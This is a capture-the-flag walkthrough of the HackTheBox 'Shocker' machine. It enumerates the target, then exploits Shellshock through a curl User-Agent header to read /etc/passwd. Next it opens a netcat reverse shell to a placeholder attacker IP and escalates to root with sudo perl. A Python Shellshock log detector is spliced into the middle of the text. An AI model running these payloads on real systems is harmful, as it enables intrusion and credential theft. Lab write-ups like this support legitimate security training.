HackTheBox: Shocker

3 min read, Mar 30, 2021

1. Port scan
nmap -Pn -p1000-

There’re 2 open ports: 80 and 2222.

2. OS and service scan

nmap -A -p80,2222

3. Vuln scan

nmap --script vuln -p80,2222

4. nikto

nikto -h

5. gobuster and dirb

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,cgi -q

While waiting for gobuster forever, I decided to use dirb instead.


Further directory enumeration, starting w/ cgi-bin

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u -x php,txt,html,sh,cgi -q

There’s user.sh

6. Access HTTP Site

Nothing more

7. HTTP Shellshock

Since I have user.sh in cgi-bin, let’s test for Shellshock.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"

It succeeded. I can proceed to getting a reverse shell.

Prepare the listener
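The probe above leaves a distinctive signature on the server side. As an added defender-side example (not part of this writeup), the following parser scans Apache combined-format access log lines for requests to CGI paths whose User-Agent carries the bash function-definition prefix that Shellshock abuses. The log lines and the 10.10.14.99 source address are constructed placeholders.

```python
import re

# Apache "combined" log format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock trigger: a bash exported-function definition "() {" at the start
# of a header value, which mod_cgi copies into the CGI script's environment.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_shellshock(value):
    """True if a header value starts with or contains the "() {" function prefix."""
    return bool(SHELLSHOCK_RE.search(value))


def detect(lines):
    """Return (host, path, user_agent) for each CGI request whose User-Agent
    carries the Shellshock pattern; other requests are ignored."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = rec["request"].split()
        path = parts[1] if len(parts) > 1 else ""
        if "/cgi-bin/" in path and is_shellshock(rec["agent"]):
            hits.append((rec["host"], path, rec["agent"]))
    return hits


# Constructed sample log lines (not taken from the box); 10.10.14.99 is a placeholder.
SAMPLE_LOG = [
    '10.10.14.99 - - [30/Mar/2021:10:01:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 312 "-" "() { :; }; echo; echo; /bin/bash -c \'cat /etc/passwd\'"',
    '10.10.14.99 - - [30/Mar/2021:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '10.10.14.99 - - [30/Mar/2021:10:01:07 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for host, path, agent in detect(SAMPLE_LOG):
        print(f"Shellshock attempt from {host} on {path}: {agent!r}")
```

The same `is_shellshock` check applies to any header mod_cgi exports (Referer, Cookie, custom headers), not only User-Agent, so a real detector should run it over every logged header field.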

rlwrap nc -lvp 443

Get the reverse shell using this command

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> 443 >/tmp/f'"

Back to the listener, I got the shell.

8. Privilege Escalation

Start with exploring the directories

cd /home
ls -la
cd shelly
ls -la

I got user.txt

Another thing is .sudo_as_admin_successful

Verify sudo rights

sudo -l

I can use perl.

Using the guide from GTFOBins

sudo perl -e 'exec "/bin/sh";'
cd /root
ls -la